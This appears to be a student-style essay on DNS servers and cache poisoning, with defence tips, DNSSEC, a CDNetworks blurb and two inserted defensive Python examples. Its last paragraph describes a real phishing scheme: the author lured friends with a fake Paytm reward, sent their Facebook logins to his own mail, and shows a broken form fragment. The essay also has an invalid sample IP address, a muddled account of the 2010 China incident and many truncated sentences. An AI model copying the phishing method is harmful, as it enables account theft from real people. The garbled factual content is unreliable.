What is a DNS Server?
A DNS server is a computer server that contains a database of public IP addresses and their associated hostnames and, in most cases, serves to resolve, or translate, those common names to IP addresses as requested.
DNS servers run special software and communicate with each other using special protocols.
In simple terms: a DNS server is a medium or channel that translates the address you type in the search bar (www.skillrack.com) into the IP address (192.252.346.102) that it actually is, which is what the computer understands.
According to me, DNS servers play an important role as a translator between hostname and IP address, because we cannot use or remember all these IP addresses to get access to any website, and the DNS server simply converts our human-readable name address to its corresponding computer-readable IP address.
What is DNS Cache Poisoning?
DNS cache poisoning, also known as DNS spoofing, is a type of attack that exploits
vulnerabilities in the domain name system (DNS) to divert Internet traffic away
from legitimate servers and towards fake ones.
One of the reasons DNS poisoning is so dangerous is that it can spread from DNS
server to DNS server. In 2010, a DNS poisoning event resulted in the Great
Firewall of China temporarily escaping China’s national borders, censoring the
Internet in the USA until the problem was fixed.
To my knowledge, on the day of some Chinese festival the DNS server of China,
which had blocked U.S. companies’ servers like twitter.com and facebook.com, got
somehow linked with the DNS server of the US, and as a result of this mishandling
the people of the US suffered as they could not get access to these social media.
If the malware changed your DNS server settings (which can happen behind the
scenes without your knowledge), entering the same URL might take you to a
completely different website, or more importantly, to a website that looks like
your bank website but really isn’t. This fake bank site might look exactly like
the real one, but instead of letting you log in to your account, it might just
record your username and password, giving the scammers all the information they
need to access your bank account.
Malware that hijacks your DNS servers generally just redirects popular websites
to ones that are full of advertisements or to fake virus websites that make you
think you have to buy a program to clean an infected computer.
DNS Caching: The Attack:
The Internet doesn’t just have a single DNS server, as that would be extremely
inefficient. Your ISP runs its own DNS servers, which cache information from
other DNS servers. Your home router functions as a domain name server, which
caches information from your ISP’s DNS servers. Your computer has a local DNS
cache, so it can quickly refer to DNS lookups it has already performed rather
than performing a DNS lookup over and over again.
Poisoning can also spread in a similar fashion. For example, if various ISPs
are getting their DNS information from the compromised server, the poisoned DNS
entry will spread to those Internet service providers and be cached there. It
will then spread to home routers and the DNS caches on computers as they look
up the DNS entry, receive the incorrect response, and store it. (This is the
case of the Great Firewall escaping China and affecting the Internet in the USA.)
Things you should do to avoid becoming a victim.
antivirus program so that malicious programs are caught before they can do any
Be aware of how a website looks. If it’s slightly off from what it usually looks like, or you’re
getting an “invalid certificate” message in your browser, it might be
a sign that you’re on an imitation website.
Check whether the site address has ‘https’ and not ‘http’ when providing any
personal information such as a username or password.
If clicking redirects you to a web page you did not expect, immediately close
the tab. This might prevent you from installing malware on your PC.
There are several measures that enterprises should take to prevent DNS cache
poisoning attacks. For starters, IT teams should configure DNS servers to rely
as little as possible on trust relationships with other DNS servers. Doing so
will make it more difficult for attackers to use their own DNS servers to
corrupt their targets’ servers. Beyond limiting trust relationships on the DNS,
IT teams should ensure that they’re using the most recent version of their DNS server software.
DNS servers that run BIND 9.5.0
or higher include features such as port randomization and cryptographically
secure transaction IDs, both of which help prevent cache poisoning attacks.
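One way a resolver can enforce those two protections before caching an answer, as an added example (not BIND's code and not code from this page): the reply must come from the queried server, arrive on the randomized source port, and echo the transaction ID and question. The function names, the 1024-65535 port range and the sample addresses are assumptions.

```python
import secrets
import struct

PORT_LOW, PORT_HIGH = 1024, 65536  # assumed ephemeral port range for this sketch

def encode_name(name):
    # Hostname -> DNS wire format: length-prefixed labels, then a root byte.
    labels = name.lower().rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def new_query(name, server, qtype=1):
    # Record every value the reply must echo before it may be cached.
    txid = secrets.randbelow(1 << 16)                           # secure transaction ID
    sport = PORT_LOW + secrets.randbelow(PORT_HIGH - PORT_LOW)  # random source port
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    packet = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + question
    pending = {"txid": txid, "sport": sport, "server": server, "question": question}
    return pending, packet

def accept_response(pending, packet, src_ip, dst_port):
    # Return (ok, reason); only ok=True replies may enter the cache.
    if len(packet) < 12:
        return False, "truncated header"
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if not flags & 0x8000:
        return False, "not a response"
    if src_ip != pending["server"]:
        return False, "unexpected source address"
    if dst_port != pending["sport"]:
        return False, "wrong destination port"
    if txid != pending["txid"]:
        return False, "transaction ID mismatch"
    want = pending["question"]
    got = packet[12:12 + len(want)]
    # Names compare case-insensitively; type and class must match exactly.
    if qdcount != 1 or got[:-4].lower() != want[:-4] or got[-4:] != want[-4:]:
        return False, "question mismatch"
    return True, "ok"

def guess_space(random_ports):
    # (TXID, port) combinations a blind forger has to cover.
    return (1 << 16) * ((PORT_HIGH - PORT_LOW) if random_ports else 1)

if __name__ == "__main__":
    pending, query = new_query("www.skillrack.com", "192.0.2.53")  # constructed sample
    reply = struct.pack("!HHHHHH", pending["txid"], 0x8180, 1, 0, 0, 0) + pending["question"]
    print(accept_response(pending, reply, "192.0.2.53", pending["sport"]))
    print(accept_response(pending, reply, "203.0.113.9", pending["sport"]))
```

With a fixed source port the only secret is the 16-bit ID; randomizing the port multiplies the number of combinations a forged reply has to match.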
The DNS server should be maintained
to ensure that it is clear of any services that aren’t needed. Extraneous services
running on the DNS server only provide attackers with more potential attack
There are also tools
available to help organizations prevent cache poisoning attacks. The most
popular cache poisoning prevention tool is probably DNSSEC (Domain Name System Security Extensions). DNSSEC is a cache poisoning prevention tool developed by
the Internet Engineering Task Force that provides secure DNS data
More information on
DNSSEC is a technology that was developed to, among
other things, protect against such attacks by digitally ‘signing’ data so you
can be assured it is valid. However, in order to eliminate the vulnerability
from the Internet, it must be deployed at each step in the lookup from root
zone to final domain name (e.g., www.icann.org). Signing the root
(deploying DNSSEC on the root zone) is a necessary step in this overall
process. Importantly, it does not encrypt data. It just
attests to the validity of the address of the site you visit.
DNSSEC works by digitally signing records for DNS
lookup using public-key cryptography. The correct DNSKEY record is
authenticated via a chain of trust, starting with a set of verified public
keys for the DNS root zone which is the trusted third party.
Domain owners generate their own keys, and upload them using their DNS control
panel at their domain-name registrar, which in turn pushes the keys via secDNS
to the zone operator (e.g., Verisign for .com) who signs and publishes them in
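One link of that chain of trust, as an added example (not code from this page or from any DNSSEC implementation): the parent zone publishes a DS record holding a hash of the child zone's DNSKEY, and a validator rejects any key that does not hash to it. The zone name and key bytes are constructed; only SHA-256 digests (type 2) are handled and signature verification is left out.

```python
import hashlib
import struct

def encode_name(name):
    # Canonical owner name: lower-case, length-prefixed labels, root byte.
    labels = name.lower().rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def dnskey_rdata(flags, algorithm, public_key):
    # DNSKEY RDATA: flags (2 bytes), protocol (always 3), algorithm, key.
    return struct.pack("!HBB", flags, 3, algorithm) + public_key

def key_tag(rdata):
    # RFC 4034 Appendix B checksum used to pair a DS with a DNSKEY.
    acc = sum(b if i & 1 else b << 8 for i, b in enumerate(rdata))
    acc += (acc >> 16) & 0xFFFF
    return acc & 0xFFFF

def ds_digest(owner, rdata):
    # DS digest type 2: SHA-256 over owner name followed by DNSKEY RDATA.
    return hashlib.sha256(encode_name(owner) + rdata).hexdigest()

def dnskey_matches_ds(owner, rdata, ds):
    # ds = (key_tag, algorithm, digest_type, digest_hex) as held by the parent.
    tag, algorithm, digest_type, digest = ds
    if digest_type != 2:
        return False  # this example only handles SHA-256
    return (tag == key_tag(rdata) and algorithm == rdata[3]
            and digest.lower() == ds_digest(owner, rdata))

# Constructed sample: 32 bytes standing in for an algorithm 15 public key.
CHILD = "example.com."
GENUINE = dnskey_rdata(257, 15, bytes(range(32)))
PARENT_DS = (key_tag(GENUINE), 15, 2, ds_digest(CHILD, GENUINE))
FORGED = dnskey_rdata(257, 15, bytes(range(1, 33)))  # key swapped in by a poisoner

def demo():
    return (dnskey_matches_ds(CHILD, GENUINE, PARENT_DS),
            dnskey_matches_ds(CHILD, FORGED, PARENT_DS))

if __name__ == "__main__":
    print(demo())
```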
cloud-based DNS management:
CDNetworks offers a managed,
cloud-based, authoritative and global DNS service, which ensures websites can
be reached, efficiently and quickly.
This is a method which
portal with advanced management and control features.
DNS security, protecting against spoofing and cache poisoning.
available thanks to built-in redundancy.
responses across the globe.
intuitive set-up and management.
You can easily acquire such a system for your PC to
remain secure at all times when browsing the net for information, and be
protected from dangerous threats that could harm your PC.
Here is an illustration of how the end user can get
an easy and quick response from the DNS server. This system calculates which is the
shortest available path to reach the user.
I have created a link through which I was able to acquire
the usernames and passwords of the Facebook accounts of several friends by telling
them that if they log in via their Facebook account they would get a free INR 100 in
their Paytm wallet. Therefore, when the user enters his account details, the
details get sent to my mail and the user is redirected to the Paytm website so that
no suspicion is created.
This is the main line of code which governs the process
method="post" novalidate="1" onsubmit="return window.